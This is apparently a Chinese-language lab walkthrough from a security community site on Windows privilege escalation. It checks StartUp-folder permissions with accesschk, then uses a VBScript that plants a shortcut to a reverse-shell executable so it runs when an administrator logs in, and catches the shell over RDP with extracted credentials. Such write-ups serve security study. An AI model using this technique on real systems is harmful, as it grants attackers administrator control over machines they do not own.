每个用户可以设置特定目录中的快捷方式。
Windows有一个应用程序的启动目录,所有应用程序都会启动
用户:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp如果我们可以在这个目录中创建文件,我们就可以使用反弹shell
管理员登录时就会触发执行恶意文件和升级权限。
这里我们要注意:必须使用快捷方式文件.lnk
提供一个VBScript脚本进行创建快捷方式文件,创建 xxx.vbs ,并运行
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\\Users\\user\\Desktop\\reverse.exe"
oLink.Save
实操
1.使用accesschk.exe检查启动时的权限目录:
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\PrivEsc>.\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
AccessChk v4.02 - Check access of files, keys, objects, processes or services
Copyright (C) 2006-2007 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW WIN-QBA94KB3IOF\Administrator
RW WIN-QBA94KB3IOF\admin
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators
R Everyone
C:\PrivEsc>使用 cscript,创建运行 xxx.vbs 脚本,该脚本会在 StartUp 目录中为 reverse.exe 可执行文件创建一个新的快捷方式:
内容如下:
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Users\user\Desktop\reverse.exe"
oLink.Save运行:
cscript C:\PrivEsc\CreateShortcut.vbs
运行vbs会自动生成一个在路径: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk 的快捷方式,然后注销当前账户!
注意:先注销当前的账户,然后就是等待管理员账户上线,记得做好监听。
模拟管理员登录: 在 Kali 上启动一个监听,然后使用RDP 和 之前提取的凭据
rdesktop -u admin 10.10.37.28
这里登录就会弹当前登录用户的权限。
反弹回来了
免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
